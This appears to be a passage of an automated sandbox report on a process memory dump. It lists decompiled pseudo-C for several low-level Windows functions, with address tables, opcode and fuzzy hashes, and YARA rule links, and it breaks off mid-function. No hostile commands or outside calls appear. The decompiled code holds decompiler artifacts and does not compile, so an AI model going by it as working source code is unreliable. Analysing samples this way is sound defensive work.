0x04902b9f
0x04902ba2
0x04902b67
0x04902b67
0x04902b69
0x04902b6b
0x04902b6e
0x04902bc9
0x04902bcc
0x04902bcf
0x04902bd4
0x04902bd6
0x04902bd6
0x04902bdb
0x04902c02
0x04902c05
0x04902c07
0x00000000
0x04902c07
0x04902be0
0x04902c00
0x04902c3f
0x04902c3f
0x00000000
0x04902c00
0x04902be5
0x04902be7
0x04902bec
0x04902bf4
0x04902bf6
0x00000000
0x04902bf6
0x04902b70
0x04902b76
0x04902b2b
0x04902b2b
0x04902b2d
0x04902b2f
0x04902b32
0x04902b35
0x04902b3a
0x00000000
0x04902b40
0x04902b43
0x04902b45
0x04902b47
0x04902b4a
0x04902b4d
0x04902b53
0x00000000
0x00000000
0x00000000
0x04902b53
0x04902b78
0x04902b78
0x04902b7b
0x04902b7e
0x00000000
0x04902b7e
0x04902b76
0x04902ba5
0x04902ba5
0x04902ba8
0x04902bad
0x00000000
0x00000000
0x04902baf
0x04902baf
0x04902bc2
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2224bd9a4ec020a2f60f081284122cda58e791a3931082c52cde6e31924098
Instruction ID: ce6b6dceeca5551d4cff5f96300c7a7132d14b9b22e0e14efe3b23107fd4fac1
Opcode Fuzzy Hash: 5c2224bd9a4ec020a2f60f081284122cda58e791a3931082c52cde6e31924098
Instruction Fuzzy Hash: CD51AF76B001259F8B14DF18C8889BDB7F2FB89700715C8BAE8469B390E734BE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0499AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0499AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0499C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0499ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0499FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0499EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E048F7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E04991608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E049A1536(0x49c8ae4, (_t74 -  *0x49c8b04 >> 0x14) + (_t74 -  *0x49c8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0499C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0499A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0497CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0499ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0499ae44
0x0499ae4c
0x0499ae53
0x0499ae55
0x0499ae5c
0x0499ae64
0x0499ae68
0x0499ae75
0x0499ae75
0x0499ae78
0x0499ae7a
0x0499ae7c
0x0499ae7f
0x0499aea8
0x0499aeab
0x0499aead
0x00000000
0x00000000
0x0499aeb3
0x0499aeb8
0x0499aebb
0x0499aebd
0x00000000
0x0499ae81
0x0499ae88
0x0499ae8f
0x0499ae9b
0x0499ae96
0x0499ae96
0x0499ae96
0x0499aea0
0x0499aea3
0x0499aebf
0x0499aebf
0x0499aec3
0x0499aec9
0x0499af0d
0x0499af14
0x0499af3d
0x0499af3d
0x0499af41
0x0499af44
0x0499af67
0x0499af67
0x0499af6a
0x0499afca
0x0499afd1
0x00000000
0x0499afd1
0x0499af6c
0x0499af6d
0x0499af75
0x0499af7c
0x0499af7e
0x0499af80
0x0499af85
0x0499af87
0x0499af99
0x0499af89
0x0499af92
0x0499af92
0x0499af9e
0x0499afa1
0x0499afa3
0x0499afa9
0x0499afb0
0x0499afb2
0x0499afb4
0x0499afbc
0x0499afbc
0x0499afb4
0x0499afb0
0x00000000
0x0499afa1
0x0499af4f
0x0499af57
0x0499af5c
0x0499af5e
0x00000000
0x00000000
0x0499af60
0x0499af64
0x0499af64
0x00000000
0x0499af64
0x0499af1a
0x0499af25
0x00000000
0x00000000
0x0499af27
0x0499af28
0x0499af33
0x00000000
0x0499aed0
0x0499aed0
0x0499aed2
0x0499aee1
0x0499aee4
0x00000000
0x00000000
0x0499aee6
0x0499aeec
0x00000000
0x00000000
0x0499aefb
0x0499af07
0x0499afd3
0x0499afdb
0x0499afdb
0x00000000
0x0499af07
0x0499aed6
0x0499aed8
0x0499aedf
0x00000000
0x00000000
0x00000000
0x0499aedf
0x0499aec9

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3251dc82baba9d6be9c88cd0d35e2f7a7181105bd528d805187c467928d32d
Instruction ID: 145b33252737b072a02ab0bbf8af4d0faa766fa197bdf90afb62e64b092896ba
Opcode Fuzzy Hash: 4e3251dc82baba9d6be9c88cd0d35e2f7a7181105bd528d805187c467928d32d
Instruction Fuzzy Hash: C841A0B17402919BDF269E2EC898B2BB7DEEF84764F044639F81687690DB34FC01C691

Uniqueness

Uniqueness Score: -1.00%

Function 048FDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E048FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E048DCC50(E048D4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E048F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E049A8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E048F2280(_t58, _v44);
						E048FDD82(_v44, _t102, _t98);
						E048FB944(_t102, _v5);
						return E048EFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x49c8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x49c862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x49c8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x49c862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x499fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x048fdbe9
0x048fdbf2
0x048fdbf7
0x048fdbf9
0x048fdbfc
0x048fdc00
0x048fdc03
0x048fdc14
0x048fdd54
0x048fdd54
0x048fdd54
0x048fdc18
0x048fdc1d
0x048fdc1d
0x048fdc32
0x048fdc3b
0x048fdc3e
0x048fdc46
0x048fdd5b
0x048fdd62
0x048fdd64
0x048fdd67
0x048fdd69
0x048fdd6b
0x048fdd6e
0x048fdd70
0x048fdd73
0x048fdd73
0x00000000
0x048fdc4c
0x048fdc4e
0x04943ae3
0x04943ae8
0x04943aea
0x048fdce7
0x048fdce9
0x048fdcec
0x048fdcee
0x048fdcf0
0x048fdcf3
0x048fdcf5
0x04943af2
0x04943af5
0x04943af5
0x048fdd06
0x048fdd08
0x048fdd0b
0x048fdd12
0x04943b08
0x048fdd18
0x048fdd18
0x048fdd18
0x048fdd20
0x048fdd23
0x04943b16
0x04943b16
0x048fdd29
0x048fdd2d
0x048fdd36
0x048fdd40
0x048fdd51
0x048fdd51
0x048fdc54
0x048fdc59
0x048fdc59
0x048fdc5e
0x048fdc5e
0x048fdc63
0x048fdc66
0x048fdc6b
0x048fdc78
0x048fdc7b
0x048fdc81
0x048fdc81
0x048fdc83
0x048fdc89
0x00000000
0x00000000
0x048fdd7b
0x048fdd7b
0x048fdc8f
0x048fdc8f
0x048fdc92
0x048fdc99
0x048fdc9f
0x048fdca5
0x048fdcaa
0x048fdcaa
0x048fdcb3
0x048fdcb8
0x048fdcbb
0x048fdcc1
0x048fdccf
0x048fdcd2
0x048fdcd5
0x048fdcd7
0x048fdcda
0x048fdcdc
0x048fdcdc
0x048fdce2
0x048fdce4
0x00000000
0x048fdce4

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41f9baebfc873dabc65428c45c2cb888fc67398451ca14f1aed24f3c938b678
Instruction ID: df68f709a0459df5c7f4f7f6beb302070fc72a42945364d1a98a6cb9a0cd3447
Opcode Fuzzy Hash: c41f9baebfc873dabc65428c45c2cb888fc67398451ca14f1aed24f3c938b678
Instruction Fuzzy Hash: 7651B171A01205DFCB14DF68C880A9EBBF1FB48314F208A6ADB56E7344EB70B944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 048EEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E048EEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E048D9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E048D2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x048eef4b
0x048eef4d
0x048eef57
0x048ef0bd
0x048ef0c2
0x048ef0d2
0x048ef0d2
0x048ef0c2
0x048eef5d
0x048eef5f
0x048eef67
0x048eef6a
0x048eef6d
0x048eef74
0x048eef7f
0x048eef82
0x048eef82
0x048eef86
0x048eef88
0x048eef8c
0x048eef8f
0x048eef8f
0x048eef8f
0x00000000
0x048eef91
0x048eef93
0x048eefc4
0x048eefc4
0x048eefc4
0x048eefca
0x048eefd0
0x048ef0a6
0x00000000
0x00000000
0x048ef0af
0x0493bb06
0x0493bb0a
0x048ef0b5
0x048ef0b5
0x048ef0b5
0x048ef0b5
0x00000000
0x048eefd6
0x048eefd9
0x048ef0de
0x048ef0e2
0x048eefdf
0x048eefdf
0x048eefdf
0x048eefe5
0x0493bafc
0x0493bafc
0x048eefe5
0x048eefeb
0x048eefed
0x048ef00f
0x048ef011
0x048ef01a
0x048ef01d
0x048ef021
0x048ef028
0x048ef029
0x048ef029
0x048ef02c
0x00000000
0x048ef02c
0x048eeff3
0x048eeff9
0x048ef0ea
0x048ef0ed
0x048ef0ef
0x00000000
0x048ef0ef
0x048ef003
0x0493bb12
0x048ef045
0x048ef049
0x048ef051
0x048ef09e
0x048ef0a0
0x048ef0a0
0x048ef09e
0x048ef053
0x048ef064
0x048ef064
0x048ef06b
0x0493bb1a
0x0493bb1a
0x048ef071
0x048ef071
0x048ef07d
0x048ef082
0x048ef08f
0x048ef08f
0x048ef009
0x048ef00d
0x00000000
0x048ef00d
0x048eefd0
0x048eef97
0x048eefa5
0x048eefaa
0x00000000
0x048eefac
0x048eefac
0x048eefac
0x00000000
0x048eefb2
0x048ef036
0x048ef03a
0x048ef040
0x048ef090
0x00000000
0x048ef092
0x048ef042
0x00000000
0x048ef042
0x048eefb7
0x048eefb9
0x048eefbc
0x048eefb0
0x048eefb0
0x00000000
0x048eefbe
0x048eefbe
0x048eefc1
0x00000000
0x048eefc1
0x048eefbc
0x048eefaa
0x048eef91

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: a0e5596bcd8932101c676b8fbe7571b5681f2d155935d08b685718abdda1abb2
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: A851E130A04249EFDB20DF6AC0807BEBBB1AF46318F1886A9DB45D7281D375B989D751

Uniqueness

Uniqueness Score: -1.00%

Function 049A740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E049A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0492D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0491F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L048F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L048F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0491F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L048F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x049a740d
0x049a740d
0x049a7412
0x049a7413
0x049a7416
0x049a7418
0x049a741c
0x049a741f
0x049a7422
0x049a7422
0x049a7428
0x049a742a
0x049a742a
0x049a7451
0x049a7432
0x049a744f
0x049a744f
0x00000000
0x049a7434
0x049a7438
0x049a7443
0x049a7517
0x049a7517
0x049a751a
0x049a7535
0x049a7520
0x049a7527
0x049a752c
0x049a7531
0x049a7533
0x00000000
0x049a7533
0x00000000
0x049a7531
0x049a754b
0x049a754f
0x049a755c
0x049a755c
0x049a755f
0x049a7560
0x049a7561
0x049a7562
0x049a7563
0x049a7568
0x049a756a
0x049a756c
0x049a756d
0x049a756d
0x049a756f
0x049a7572
0x049a7574
0x049a7577
0x049a757c
0x049a757f
0x00000000
0x049a7551
0x049a7551
0x049a7551
0x049a7553
0x049a7553
0x049a7449
0x049a7449
0x049a744c
0x049a744c
0x00000000
0x049a744c
0x049a7443
0x049a750e
0x049a7514
0x049a7514
0x049a7455
0x049a7469
0x049a746d
0x00000000
0x049a7473
0x049a7473
0x049a7476
0x049a7480
0x049a7484
0x049a748e
0x049a7493
0x049a7493
0x049a7496
0x049a7499
0x049a74a1
0x049a74b1
0x049a74b5
0x00000000
0x049a74bb
0x049a74c1
0x049a74c1
0x049a74c4
0x049a74c5
0x049a74c6
0x049a74c7
0x049a74c8
0x049a74cd
0x00000000
0x049a74d3
0x049a74d3
0x049a74d6
0x049a74d8
0x049a74db
0x049a74dd
0x049a74e0
0x049a74e7
0x049a74ee
0x049a74ee
0x049a74f4
0x049a74f9
0x00000000
0x049a74fb
0x049a74fb
0x049a74fd
0x049a7500
0x049a7503
0x049a7505
0x049a7505
0x049a74f9
0x00000000
0x049a74cd
0x049a74b5
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 937f18aaf7e73e7375a3d6f50843b76c5165cf8e4caed2a3cedb145141119b72
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 95519C71600606EFDB15CF54C881A56BBB9FF45304F1485BAE9089F212E371FA56CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04902990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04902990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x49aff00);
				E0492D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x48b1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0491E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x48b1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E049551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x48b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
